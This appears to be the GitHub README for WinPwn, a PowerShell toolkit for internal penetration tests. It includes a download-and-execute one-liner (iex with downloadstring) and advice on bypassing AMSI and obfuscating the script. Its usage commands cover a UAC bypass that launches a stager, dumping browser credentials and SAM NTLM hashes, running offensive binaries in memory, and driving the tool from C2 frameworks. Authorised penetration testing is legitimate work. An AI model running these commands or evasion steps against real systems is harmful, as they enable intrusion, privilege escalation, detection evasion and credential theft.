Home

Awesome

Sponsored by

<img src="https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/happy_alp.png" width="300" height="300">      

WinPwn

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I also often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects.

Any suggestions, feedback, Pull requests and comments are welcome!

Just Import the Modules with:

Import-Module .\WinPwn.ps1 or iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

To bypass AMSI take one of the existing bypass techniques, find the AMSI trigger and manually change it in the bypass function or encode the trigger string. Alternatively obfuscate the whole script.

If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, the most important scripts and executables are included.

Functions available after Import:

alt text

Without parameters, most of the functions can only be used from an interactive shell. So i decided to add the parameters -noninteractive and -consoleoutput to make the script usable from an asynchronous C2-Framework like Empire, Covenant, Cobalt Strike or others. Additionally the -repo parameter was added to use WinPwn with all its features from a local repository. They can be used as follows:

Usage:

-noninteractive -> No questions for functions so that they run with predefined or user defined parameters

-consoleoutput -> The loot/report folders are not created. Every function returns the output to the console so that you can take a look at everything in the Agent logs of your C2-Framework Examples:

WinPwn -noninteractive -consoleoutput -DomainRecon -> This will return every single domain recon script and function and will probably give you really much output

WinPwn -noninteractive -consoleoutput -Localrecon -> This will enumerate as much information for the local system as possible

Generalrecon -noninteractive -> Execute basic local recon functions and store the output in the corresponding folders

UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp -> Execute a stager in a high integrity process from a low privileged session

Kittielocal -noninteractive -consoleoutput -browsercredentials -> Dump Browser-Credentials via Sharpweb returning the output to console

Kittielocal -noninteractive -browsercredentials -> Dump SAM File NTLM-Hashes and store the output in a file

WinPwn -PowerSharpPack -consoleoutput -noninteractive -> Execute Seatbelt, PowerUp, Watson and more C# binaries in memory

Dotnetsearch -consoleoutput -noninteractive -> Search in C:\Program Files\ and C:\Program Files (x86)\ for .NET assemblies

WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo -> Use a local webserver as offline repo to use WinPwn without internet access

Get_WinPwn_Repo.sh:

Usage: ./Get_WinPwn_Repo.sh {Option}

Example: ./Get_WinPwn_Repo.sh --install

Options: --install Download the repository and place it to ./WinPwn_Repo/ --remove Remove the repository ./WinPwn_Repo/ --reinstall Remove the repository and download a new one to ./WinPwn_Repo/ --start-server Start a python HTTP server on port 8000 --help Show this help

TO-DO

CREDITS

Stargazers over time

Stargazers over time

Legal disclaimer:

Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.